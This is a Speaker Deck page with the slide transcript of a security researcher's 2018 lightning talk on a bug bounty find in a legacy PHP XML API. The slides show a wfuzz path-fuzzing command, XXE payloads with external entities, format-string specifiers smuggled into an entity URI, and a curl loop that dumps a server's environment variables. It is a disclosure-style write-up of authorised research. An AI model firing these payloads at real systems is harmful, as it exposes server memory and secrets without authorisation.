Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web based format injection, dumping memory like...
Search
Frans Rosén
September 19, 2018
Research
0
63
Web based format injection, dumping memory like it's 99 (or "Please help")
My lightning talk from Sec-T Stockholm in September 2018.
Frans Rosén
September 19, 2018
Tweet
Share
More Decks by Frans Rosén
See All by Frans Rosén
X-Correlation Injections (or How to break server-side contexts)
fransrosen
0
780
Story of a RCE on Apple through hot jar swapping
fransrosen
0
950
Account hijacking using "dirty dancing" in sign-in OAuth-flows
fransrosen
0
160
A methodology using fuzzing and info disclosure
fransrosen
0
210
Live Hacking like a MVH – A walkthrough on methodology and strategies to win big
fransrosen
3
8.7k
A story of the passive aggressive sysadmin of AEM
fransrosen
0
7.9k
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
fransrosen
3
6.6k
Other Decks in Research
See All in Research
Weekly AI Agents News!
masatoto
24
22k
LINEチャットボット「全力肯定彼氏くん(LuC4)」の 1年を振り返る
o_ob
0
2.5k
SNLP2024:Planning Like Human: A Dual-process Framework for Dialogue Planning
yukizenimoto
1
310
Weekly AI Agents News! 8月号 論文のアーカイブ
masatoto
1
150
第60回名古屋CV・PRMU勉強会:CVPR2024論文紹介(Vision Transformer)
waka_90b
1
190
最近のVisual Odometryと Depth Estimation
sgk
1
260
Weekly AI Agents News! 7月号 論文のアーカイブ
masatoto
1
200
説明可能AIの基礎と研究動向
yuyay
0
120
「並列化時代の乱数生成」
abap34
3
780
20240719_第2回熊本の交通を語る会
trafficbrain
0
510
LLM時代の半導体・集積回路
kentaroy47
1
460
LLM時代にLabは何をすべきか聞いて回った1年間
hargon24
1
480
Featured
See All Featured
The Power of CSS Pseudo Elements
geoffreycrofte
72
5.3k
Understanding Cognitive Biases in Performance Measurement
bluesmoon
26
1.4k
How to Think Like a Performance Engineer
csswizardry
19
1.1k
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
7
150
"I'm Feeling Lucky" - Building Great Search Experiences for Today's Users (#IAC19)
danielanewman
225
22k
Fantastic passwords and where to find them - at NoRuKo
philnash
50
2.8k
The Language of Interfaces
destraynor
154
24k
Exploring the Power of Turbo Streams & Action Cable | RailsConf2023
kevinliebholz
27
4.1k
Intergalactic Javascript Robots from Outer Space
tanoku
268
27k
The Illustrated Children's Guide to Kubernetes
chrisshort
48
48k
What’s in a name? Adding method to the madness
productmarketing
PRO
22
3.1k
Let's Do A Bunch of Simple Stuff to Make Websites Faster
chriscoyier
504
140k
Transcript
@fransrosen Web based format injection, dumping memory like it's 99
or "Please help"
@fransrosen Public Bug Bounty
@fransrosen RCE is 30,000 USD
@fransrosen Methodology • Found a domain not like the other
ones
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available
@fransrosen Methodology • Found a domain not like the other
ones • Legacy on-premise PHP-app acquired by a huge tech organization • Old API-endpoints still available 👍 👍 👍
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! Interesting
path: /cgi-bin/default/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen Methodology • Google + GitHub etc • wfuzz! /cgi-bin/default/php/
@fransrosen Methodology • Google + GitHub etc • wfuzz! python
wfuzz/src/wfuzz-cli.py -Z -w w.txt -c \ -H "User-Agent: Mozilla.." \ "https://www.techsite.com/cgi-bin/default/php/FUZZ
@fransrosen Methodology • Google + GitHub etc • wfuzz!
@fransrosen xml_api?
@fransrosen xml_api?
@fransrosen xml_api? YEAH! 👍
@fransrosen wtf!?
@fransrosen XXE!
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver">
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root SYSTEM "http://my-dns-resolver"> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "http://my-dns-resolver"> ]>
<Envelope><Body><exec><transaction>&exl;</transaction> </exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY % exl SYSTEM "http://my-dns-resolver">%exl;
]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> ???
@fransrosen
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxxåäö"> ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen XXE! <!DOCTYPE root [ <!ENTITY exl SYSTEM "hxxp://xxx%x" ]>
<Envelope><Body><exec><transaction></transaction></exec></Body></Envelope> WOAH.
@fransrosen Format String Injection?
@fransrosen Format String Injection ON ZE WEB?
@fransrosen Format String Injection http://www.cis.syr.edu/~wedu/Teaching/cis643/LectureNotes_New/Format_String.pdf
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Format String Injection <!DOCTYPE root [ <!ENTITY exl SYSTEM
"%x %x %s" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen I can’t handle this shit
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen Help me, zetatwo
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen zetatwo: latin1! <?xml version="1.0" encoding="latin1"?> <!DOCTYPE root [ <!ENTITY
exl SYSTEM "åäö" ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>
@fransrosen Limitations 0x20-0xFF (no 0x22)
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen Limitations 0x09 0x0a 0x0d + 0x20-0x21 + 0x23-0xff
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen We can read all ENVs for i in $(seq
8460 8550); do res=$(curl -s -X POST -H 'Content-Type: text/xml; charset="UTF-8"' \—data-binary \ ’<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE x [ <!ENTITY ba SYSTEM " %'${i}'$s "> ]> <Envelope><Body><exec><transaction></transaction></exec></Body></Envelope>'
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Response "We are unable to see anything sensitive in
the response. If you believe you have found sensitive information please provide this to us."
@fransrosen Want to collaborate? @fransrosen
@fransrosen Questions? Suggestions?